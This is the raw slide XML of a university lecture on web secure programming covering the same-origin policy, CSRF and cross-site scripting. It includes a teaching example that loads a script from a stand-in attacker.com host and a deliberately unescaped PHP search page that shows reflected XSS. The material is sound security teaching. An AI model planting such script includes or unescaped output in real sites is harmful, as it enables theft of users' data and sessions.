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7" r:id="rId2"/>
    <p:sldId id="259" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="286" r:id="rId11"/>
    <p:sldId id="289" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="269" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="277" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="290" r:id="rId24"/>
    <p:sldId id="281" r:id="rId25"/>
    <p:sldId id="282" r:id="rId26"/>
    <p:sldId id="283" r:id="rId27"/>
    <p:sldId id="284" r:id="rId28"/>
    <p:sldId id="273" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="291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292" r:id="rId41"/>
    <p:sldId id="287" r:id="rId42"/>
    <p:sldId id="288" r:id="rId43"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr marL="0" algn="l" defTabSz="9140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27" algn="l" defTabSz="9140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48" algn="l" defTabSz="9140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72" algn="l" defTabSz="9140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97" algn="l" defTabSz="9140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20" algn="l" defTabSz="9140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44" algn="l" defTabSz="9140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67" algn="l" defTabSz="9140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88" algn="l" defTabSz="9140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4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46D5E-7B45-4F53-8792-9DB187E51B89}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/10/15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1A2BB-726D-494F-81DF-13E7E330F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8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27" algn="l" defTabSz="9140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48" algn="l" defTabSz="9140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72" algn="l" defTabSz="9140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97" algn="l" defTabSz="9140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20" algn="l" defTabSz="9140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44" algn="l" defTabSz="9140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67" algn="l" defTabSz="9140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88" algn="l" defTabSz="9140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D00A2-EA08-43B5-9062-79D54988E3F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 allows everything from the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> same origin policy (same scheme, host, and port)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1A2BB-726D-494F-81DF-13E7E330FA4C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51711" y="1721313"/>
            <a:ext cx="6109348" cy="117049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4418" y="3167217"/>
            <a:ext cx="6177992" cy="82623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6443" y="6265581"/>
            <a:ext cx="1922042" cy="4819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57649" y="6265581"/>
            <a:ext cx="2814419" cy="4819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21214" y="6265581"/>
            <a:ext cx="1922042" cy="4819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4218E-3486-4761-8217-4506132B53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5A0E8-93C0-4AC9-AB4A-2BD81DFA5C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2952" y="68857"/>
            <a:ext cx="2179458" cy="60274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577" y="68857"/>
            <a:ext cx="6401086" cy="60274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95C2F-A5D0-4256-A593-9D1BF273A2D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F34CA-8BE8-477A-AA57-493F145772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01" y="4406563"/>
            <a:ext cx="7772543" cy="136270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01" y="2906151"/>
            <a:ext cx="7772543" cy="1500412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="412232" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="824470" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1236706" indent="0">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1648942" indent="0">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2061179" indent="0">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2473413" indent="0">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2885650" indent="0">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="329788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58461-8CF8-48B8-9001-CE214FF037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577" y="1377056"/>
            <a:ext cx="4255950" cy="4719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816" y="1377056"/>
            <a:ext cx="4255950" cy="4719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770D0-6AAF-40AB-9FFE-CAD0FD37E25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29" y="273976"/>
            <a:ext cx="8228742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32" y="1534847"/>
            <a:ext cx="4040007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232" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="824470" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1236706" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1648942" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2061179" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2473413" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2885650" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="32978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32" y="2174602"/>
            <a:ext cx="4040007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35" y="1534847"/>
            <a:ext cx="4041436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232" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800" b="1"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="824470" indent="0">
              <a:buNone/>
              <a:defRPr sz="1600" b="1"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1236706" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1648942" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2061179" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2473413" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2885650" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400" b="1"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="32978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35" y="2174602"/>
            <a:ext cx="4041436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FC354-6B9A-4FF6-BEDA-80AB2F756DF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49180-86FF-48AA-8117-868517D522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13A92-6596-44C6-A988-55294A8F48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39" y="272551"/>
            <a:ext cx="3007481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7" y="272550"/>
            <a:ext cx="5111144" cy="585390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39" y="1434428"/>
            <a:ext cx="3007481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2232" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="824470" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1236706" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1648942" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2061179" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2473413" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2885650" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="329788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20BA2-6314-48E7-BD48-9374FA1F1F9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04" y="4801030"/>
            <a:ext cx="5487258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904" y="612511"/>
            <a:ext cx="5487258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2232" indent="0">
              <a:buNone/>
              <a:defRPr sz="2500"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="824470" indent="0">
              <a:buNone/>
              <a:defRPr sz="2200"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1236706" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1648942" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2061179" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2473413" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2885650" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3297886" indent="0">
              <a:buNone/>
              <a:defRPr sz="18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04" y="5367629"/>
            <a:ext cx="5487258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2232" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="824470" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1236706" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1648942" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2061179" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2473413" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2885650" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="329788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90EA7-6ABE-45CE-B5DB-785800D429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1531" y="68853"/>
            <a:ext cx="7550879" cy="82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577" y="1377056"/>
            <a:ext cx="8649189" cy="471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6443" y="6248377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748" y="6248377"/>
            <a:ext cx="2894504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676" y="6248377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9F5A5E-37C1-4D2C-A363-9CA725561682}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill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649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4649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l" defTabSz="914649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l" defTabSz="914649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l" defTabSz="914649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12232" algn="l" defTabSz="914649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824470" algn="l" defTabSz="914649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236706" algn="l" defTabSz="914649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648942" algn="l" defTabSz="914649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342100" indent="-342100" algn="l" defTabSz="914649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882" indent="-286274" algn="l" defTabSz="914649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2235" indent="-227594" algn="l" defTabSz="914649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598845" indent="-227594" algn="l" defTabSz="914649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2056885" indent="-229021" algn="l" defTabSz="914649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69119" indent="-229021" algn="l" defTabSz="9146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81356" indent="-229021" algn="l" defTabSz="9146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293591" indent="-229021" algn="l" defTabSz="9146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05827" indent="-229021" algn="l" defTabSz="9146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44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232" algn="l" defTabSz="8244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4470" algn="l" defTabSz="8244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6706" algn="l" defTabSz="8244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8942" algn="l" defTabSz="8244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1179" algn="l" defTabSz="8244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3413" algn="l" defTabSz="8244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5650" algn="l" defTabSz="8244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7886" algn="l" defTabSz="8244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951711" y="2328034"/>
            <a:ext cx="6109348" cy="117049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Web Secure Programming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814418" y="3773935"/>
            <a:ext cx="6177992" cy="826230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lecture 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tamara </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Rezk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SOP and CSRF?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Recall: SOP does not apply to &lt;script&gt;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If inside the page from trusted.com we have:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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=“http://www.attacker.com/evil.js”&gt;&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>that attacks trusted.com with CSRF, how attacker server obtains the contacts?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attacker.com can XHR to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> trusted.com but not to  attacker.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>With HTML5, you can allow XHR cross requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>This means: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>before HTML5: for the server of attacker.com to get contacts, user should click on a link of the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>after HTML5: the same as before but additionally XHR can work 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SOP and CSRF?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If inside the page from trusted.com we have:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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=“http://www.attacker.com/evil.js”&gt;&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>that attacks trusted.com with CSRF, how attacker server obtains the contacts?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attacker.com can XHR to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> trusted.com but not to  attacker.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>With HTML5, you can allow XHR cross requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>This means: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>before HTML5: for the server of attacker.com to get contacts, user should click on a link of the attacker or depending on navigation policy, change location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>after HTML5: the same as before but additionally XHR can work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What happens if attacker.com script is inside a frame? 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 smtClean="0"/>
              <a:t>Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> A3 Code Injection : Cross Site Scripting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injection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Data-tier code injection (SQL)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Client-tier code injection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/DOM)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Server-tier code injection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injection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Injected code can modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on :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Server: for example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behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> injection.  Server side injection is commonly known as just Injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client: for example injection of a JavaScript  script  executing on a browser’s victim. Client side injection is commonly known as XSS.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XSS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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XSS  is present when an attacker can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> scripting code into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> generated by a web application.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Methods for injecting malicious code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reflected or Non-Persistent XSS (“type 1”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attack script is reflected back to the user as part of a page from the victim site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Stored  or Persistent XSS (“type 2”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>the attacker stores the malicious code in a resource managed by the web application, such as a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Others, such as DOM-based attacks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629" y="1600821"/>
            <a:ext cx="8228742" cy="4872752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514306" indent="-514306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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514306" indent="-514306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cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" baseline="-25000" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, … , i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" baseline="-25000" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" baseline="-25000" dirty="0" smtClean="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514306" indent="-514306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cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514306" indent="-514306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cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server program</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274296" indent="-274296" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, … , i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> input  (provided by client)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274296" indent="-274296" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c             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client code: HTML document with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> nodes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" baseline="-25000" dirty="0" smtClean="0">
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="274296" indent="-274296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cs typeface="Arial" pitchFamily="34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269922" y="-215163"/>
            <a:ext cx="8686371" cy="1143239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91432" tIns="45716" rIns="91432" bIns="45716" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514306" indent="-514306" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="36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Dynamic Code Generation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XSS Vulnerable code  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5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>search field on victim.com:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/search.php ? term = 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</a:rPr>
              <a:t>apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Server-side implementation of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="1799"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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&lt;HTML&gt;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&lt;BODY&gt;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Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php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 echo $_GET[term] ?&gt; :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. . .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&lt;/BODY&gt;   &lt;/HTML&gt;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Reflected XSS attack on example 1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31462" y="1346929"/>
            <a:ext cx="9112538" cy="4874186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dirty="0" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
